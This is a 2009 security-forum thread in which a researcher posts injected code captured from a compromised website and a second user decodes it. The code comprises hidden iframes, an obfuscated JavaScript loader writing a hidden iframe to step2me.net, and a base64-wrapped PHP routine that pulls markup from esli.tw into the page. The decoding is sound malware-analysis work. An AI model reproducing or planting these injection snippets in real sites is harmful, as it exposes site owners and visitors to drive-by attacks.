Author Topic: weird script for researchers...  (Read 3580 times)


September 13, 2009, 09:14:46 pm

cleanmx

Code: [Select]
<iframe src="http://3f7.ru:8
<iframe rwlrl='kPaLvKn7' iwnvq='vwVE18tV' yrpli='YZMyHjlR' src='http://newsmeta.net/s/in.cgi?8 ' fcwku='v3KFiRhP' liuhf='kXJm0aa8' btmqh='xu
  <meta http-equiv="content-type"
<body style="background-image: url(brsostav200.JPG);"><script>c10ze25='';ya271e09=/* y16b29deb8 */document;ya271e09.write('<scr'+'ipt>function yc87feb6a9(ye
b482){return e'+c10ze25+'val(yeb482); }</scr'+'ipt>');  function c101e3f8acyf0aec(ya518412a){ function yd92cd8(){var y8b6913395=16;return y8b6913395;} var z
c8='';return (yc87feb6a9('p'+zc8+'arseInt')(ya518412a,yd92cd8()));}function ycf86d8(y52318d){ var y7ba103ed2=2; var y1490c='';y91f64a1='fromCh';y779890=Stri
ng[y91f64a1+'arCode'];for(y5310736=0;y5310736<y52318d.length;y5310736+=y7ba103ed2){ y1490c+=(y779890(c101e3f8acyf0aec(y52318d.substr(y5310736,y7ba103ed2))))
;}return y1490c;} var y787dd4f95='3C7363726970743E69662821'+c10ze25+'6D796961'+c10ze25+'297B646F63756D656E742E777269746528756E65736361'+c10ze25+'70652820272
53363253639253636253732253631'+c10ze25+'253664253635253230253665253631'+c10ze25+'253664253635253364253633253331'+c10ze25+'2533302532302537332537322536332533
64253237253638253734253734253730253361'+c10ze25+'25326625326625373325373425363525373025333225366425363525326525366525363525373425326625326525363425363925363
6253266253637253666253265253730253638253730253366253733253639253634253364253331'+c10ze25+'26253237253262253464253631'+c10ze25+'25373425363825326525373225366
6253735253665253634253238253464253631'+c10ze25+'253734253638253265253732253631'+c10ze25+'253665253634253666253664253238253239253261'+c10ze25+'25333325333525
3339253337253339253239253262253237253634253636253636253335253636253632253633253631'+c10ze25+'253339253635253336253632253237253230253737253639253634253734253
638253364253332253330253331'+c10ze25+'253230253638253635253639253637253638253734253364253331'+c10ze25+'25333725333925323025373325373425373925366325363525336
4253237253736253639253733253639253632253639253663253639253734253739253361'+c10ze25+'253638253639253634253634253635253665253237253365253363253266253639253636
253732253631'+c10ze25+'2536642536352533652729293B7D7661'+c10ze25+'72206D796961'+c10ze25+'3D747275653B3C2F7363726970743E';ya271e09.write(ycf86d8(y787dd4f95))
;</script><?eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGxpbmtzID0gbmV3IEdldExpbmtzKCk7DQoNCmVjaG8gJGxpbmtzLT5MaW5rczsNCmNsYXNzIEdldExpbmtzDQp7DQoJdmFy
ICRob3N0ID0gImVzbGkudHciOw0KCXZhciAkcGF0aCA9ICIvbGluay5waHA/c2l0ZT0iOw0KCXZhciAkc2l0ZSA9ICIiOw0KCXZhciAkdXNlcl9hZ2VudCA9ICIiOw0KDQoJdmFyICRMaW5rcyA9ICIiOw0K
DQoNCgl2YXIgJF9zb2NrZXRfdGltZW91dCAgICA9IDEyOw0KCXZhciAkX2Nhc2hlX2xpZmVfdGltZSAgICA9IDM2MDA7DQoJdmFyICRfY2FzaGVfZmlsZQkJCSAgICA9ICJjYXNoZS50eHQiOw0KDQoJZnVu
Y3Rpb24gR2V0TGlua3MoKQ0KCXsNCgkJaWYgKCFpc19maWxlKCR0aGlzLT5fY2FzaGVfZmlsZSkgfHwgKGZpbGVtdGltZSgkdGhpcy0+X2Nhc2hlX2ZpbGUpIDwgKHRpbWUoKS0kdGhpcy0+X2Nhc2hlX2xp
ZmVfdGltZSkpIHx8IGZpbGVzaXplKCR0aGlzLT5fY2FzaGVfZmlsZSkgPT0gMCkgew0KDQoJCQkkdGhpcy0+c2l0ZQkJCQk9IGlzc2V0KCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgPyAkX1NFUlZFUlsnSFRU
UF9IT1NUJ10gOiAkSFRUUF9TRVJWRVJfVkFSU1snSFRUUF9IT1NUJ107DQoJCQkkdGhpcy0+dXNlcl9hZ2VudCA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCgkJCQ0KCQkJJHRoaXMtPkxpbmtz
IAkJCT0gJHRoaXMtPmZldGNoX3JlbW90ZV9maWxlKCk7DQoJCQlpZiAoJGhhbmRsZSA9IGZvcGVuKCR0aGlzLT5fY2FzaGVfZmlsZSwgJ3cnKSkgew0KCQkJCWZ3cml0ZSgkaGFuZGxlLCAkdGhpcy0+TGlu
a3MpOw0KCQkJfQ0KDQoJCQlmY2xvc2UoJGhhbmRsZSk7DQoJCX0NCgkJZWxzZSB7DQoJCQkkdGhpcy0+TGlua3MgPSBmaWxlX2dldF9jb250ZW50cygkdGhpcy0+X2Nhc2hlX2ZpbGUpOw0KCQl9DQoJfQ0K
DQoJZnVuY3Rpb24gZmV0Y2hfcmVtb3RlX2ZpbGUoKQ0KCXsNCgkgICRidWZmID0gJyc7DQogICAgJGZwID0gZnNvY2tvcGVuKCR0aGlzLT5ob3N0LCA4MCwgJGVycm5vLCAkZXJyc3RyLCAkdGhpcy0+X3Nv
Y2tldF90aW1lb3V0KTsNCiAgICBpZiAoISRmcCkgew0KDQogICAgfSBlbHNlIHsNCiAgICAgICAgJG91dCA9ICJHRVQgeyR0aGlzLT5wYXRofXskdGhpcy0+c2l0ZX0gSFRUUC8xLjFcclxuIjsNCiAgICAg
ICAgJG91dCAuPSAiSG9zdDogeyR0aGlzLT5ob3N0fVxyXG4iOw0KICAgICAgICAkb3V0IC49ICJDb25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIjsNCiAgICANCiAgICAgICAgZndyaXRlKCRmcCwgJG91dCk7
DQogICAgICAgIHdoaWxlICghZmVvZigkZnApKSB7DQogICAgICAgICAgICAkYnVmZiAuPSBmZ2V0cygkZnAsIDEyOCk7DQogICAgICAgIH0NCiAgICAgICAgZmNsb3NlKCRmcCk7DQogIAkJCSRwYWdlID0g
ZXhwbG9kZSgiXHJcblxyXG4iLCAkYnVmZik7DQogIAkJCXJldHVybiAkcGFnZVsxXTsNCiAgICB9DQoJfQ0KfQ=='));?><!-- o65 --><!-- c65 -->
 href="http://www.borodinsky.net">El pan de Borodin&#243;</a> - uno de las
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <td><a href="http://www.arteadentro.com.ar/ecole/index.html" onMouseOut="MM_swapImgRestore();" onMouseOver="MM_swapImage('index_r1_c1','','index_r1_c1_f2
.jpg',1);"><img name="index_r1_c1" src="index_r1_c1.jpg" width="279" height="323" border="0" alt=""></a></td>
   <td rowspan="2"><a href="http://www.arteadentro.com.ar/arteadentroo/index.htm" onMouseOut="MM_swapImgRestore();" onMouseOver="MM_swapImage('index_r1_c2',
'','index_r1_c2_f2.jpg',1);"><img name="index_r1_c2" src="index_r1_c2.jpg" width="421" height="500" border="0" alt=""></a></td>
   <td><a href="http://www.arteadentro.com.ar/anahi/index.htm" onMouseOut="MM_swapImgRestore();" onMouseOver="MM_swapImage('index_r2_c1','','index_r2_c1_f2.
jpg',1);"><img name="index_r2_c1" src="index_r2_c1.jpg" width="279" height="177" border="0" alt=""></a></td>

September 13, 2009, 10:36:05 pm
Reply #1

SysAdMini

The sample has multiple parts.


starts with an incomplete iframe
Code: [Select]
<iframe src="http://3f7.ru:8
which probably is
Code: [Select]
<iframe src="http://3f7.ru:8080>
another iframe
Code: [Select]
<iframe rwlrl='kPaLvKn7' iwnvq='vwVE18tV' yrpli='YZMyHjlR' src='http://newsmeta.net/s/in.cgi?8 ' fcwku='v3KFiRhP' liuhf='kXJm0aa8' btmqh='xu
  <meta http-equiv="content-type"
<body style="background-image: url(brsostav200.JPG);">

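The script from "c10ze25=''" to "ya271e09.write(ycf86d8(y787dd4f95));</script>" (hex pairs converted with parseInt/String.fromCharCode, wrapping a document.write(unescape(...)) of a percent-encoded string) decodes to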
Code: [Select]
<iframe name=c10 src='http://step2me.net/.dif/go.php?sid=1&'+Math.round(Math.random()*35979)+'dff5fbca9e6b' width=201 height=179 style='visibility:hidden'></iframe>
the eval(base64_decode) section decodes to
Code: [Select]
// Decoded payload of the eval(base64_decode('...')) wrapper found in the infected page.
// As written: whenever the infected page is executed, it echoes markup obtained from a
// hard-coded remote host (esli.tw), caching the response locally in cashe.txt for up to
// 3600 seconds. The remote response is printed unescaped, so whoever controls that host
// controls what is injected into the page.
// Indicators visible in this code: outbound connections from the web server to
// esli.tw on port 80, requests for /link.php?site=<hostname of the infected site>,
// a file named cashe.txt next to the web content, and eval(base64_decode( in page source.
// NOTE(review): the wrapper appears verbatim in the captured HTML of the original sample,
// which suggests the server was not executing it in that file — confirm against the server config.

// Turn off PHP error reporting, so failures below produce no visible warnings.
error_reporting(0);
// Instantiating the class runs GetLinks() below, which fills $Links.
$links = new GetLinks();

// Emit the fetched (or cached) remote content straight into the page output.
echo $links->Links;
class GetLinks
{
// Hard-coded remote host and request path; the infected site's host name is appended to $path.
var $host = "esli.tw";
var $path = "/link.php?site=";
var $site = "";
// Filled from the visitor's User-Agent in GetLinks() but never read anywhere in this code.
var $user_agent = "";

// Content that ends up echoed into the page (presumably link markup, judging by the names;
// the remote response itself is not shown here).
var $Links = "";


// Connect timeout in seconds for fsockopen().
var $_socket_timeout    = 12;
// Cache lifetime in seconds, compared against the cache file's mtime.
var $_cashe_life_time    = 3600;
// Relative path: resolved against the PHP process's current working directory.
var $_cashe_file     = "cashe.txt";

// Method named like the class, i.e. a PHP 4-style constructor (PHP 8 no longer treats it as one).
function GetLinks()
{
// Refresh when the cache file is missing, older than the lifetime, or empty.
if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {

// Host name of the infected site as sent by the client; reported to the remote host in the request path.
$this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
$this->user_agent = $_SERVER['HTTP_USER_AGENT'];

$this->Links = $this->fetch_remote_file();
// Write the response to the cache file; a failed fetch yields an empty file, which
// the filesize() == 0 test above treats as stale on the next run.
if ($handle = fopen($this->_cashe_file, 'w')) {
fwrite($handle, $this->Links);
}

// Runs even when fopen() failed above.
fclose($handle);
}
else {
// Cache is fresh: serve the stored content without contacting the remote host.
$this->Links = file_get_contents($this->_cashe_file);
}
}

// Fetches {$path}{$site} from $host over plain HTTP on port 80 using a raw socket.
// Returns the response segment after the first blank line, or nothing if the connect fails.
function fetch_remote_file()
{
  $buff = '';
    $fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
    if (!$fp) {
// Connect failure is ignored silently; the function falls through without a return value.

    } else {
        $out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
        $out .= "Host: {$this->host}\r\n";
        $out .= "Connection: Close\r\n\r\n";
   
        fwrite($fp, $out);
// Read the whole response until the remote side closes the connection.
        while (!feof($fp)) {
            $buff .= fgets($fp, 128);
        }
        fclose($fp);
// Split on blank lines and keep element 1: the text between the header block and the
// next "\r\n\r\n", so a body containing a blank line is cut at that point.
  $page = explode("\r\n\r\n", $buff);
  return $page[1];
    }
}
}

the rest of the page
Code: [Select]
href="http://www.borodinsky.net">El pan de Borodin&#243;</a> - uno de las
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <td><a href="http://www.arteadentro.com.ar/ecole/index.html" onMouseOut="MM_swapImgRestore();" onMouseOver="MM_swapImage('index_r1_c1','','index_r1_c1_f2
.jpg',1);"><img name="index_r1_c1" src="index_r1_c1.jpg" width="279" height="323" border="0" alt=""></a></td>
   <td rowspan="2"><a href="http://www.arteadentro.com.ar/arteadentroo/index.htm" onMouseOut="MM_swapImgRestore();" onMouseOver="MM_swapImage('index_r1_c2',
'','index_r1_c2_f2.jpg',1);"><img name="index_r1_c2" src="index_r1_c2.jpg" width="421" height="500" border="0" alt=""></a></td>
   <td><a href="http://www.arteadentro.com.ar/anahi/index.htm" onMouseOut="MM_swapImgRestore();" onMouseOver="MM_swapImage('index_r2_c1','','index_r2_c1_f2.
jpg',1);"><img name="index_r2_c1" src="index_r2_c1.jpg" width="279" height="177" border="0" alt=""></a></td>